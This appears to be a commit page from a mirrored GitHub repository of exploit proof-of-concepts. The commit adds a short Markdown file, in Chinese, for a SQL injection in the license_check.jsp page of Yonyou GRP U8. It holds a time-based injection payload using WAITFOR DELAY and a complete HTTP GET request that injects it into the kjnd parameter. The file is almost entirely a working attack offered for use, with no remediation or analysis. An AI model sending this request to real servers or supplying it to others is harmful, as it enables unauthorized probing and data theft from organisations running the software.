mirror of
https://github.com/wooluo/POC00.git
synced 2026-07-02 19:25:35 +08:00
Create 用友 GRP U8 license_check.jsp 存在SQL注入.md
This commit is contained in:
18
用友 GRP U8 license_check.jsp 存在SQL注入.md
Normal file
18
用友 GRP U8 license_check.jsp 存在SQL注入.md
Normal file
@@ -0,0 +1,18 @@
|
|||||||
|
|
||||||
|
## 用友 GRP U8 license_check.jsp 存在SQL注入
|
||||||
|
|
||||||
|
## sql注入payload
|
||||||
|
```
|
||||||
|
';WAITFOR DELAY '0:0:5'-- q
|
||||||
|
```
|
||||||
|
|
||||||
|
## poc
|
||||||
|
```
|
||||||
|
|
||||||
|
GET /u8qx/license_check.jsp?kjnd=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
|
||||||
|
Host:
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
|
||||||
|
Connection: close
|
||||||
|
```
|
||||||
|
|
||||||
|

|
||||||
Reference in New Issue
Block a user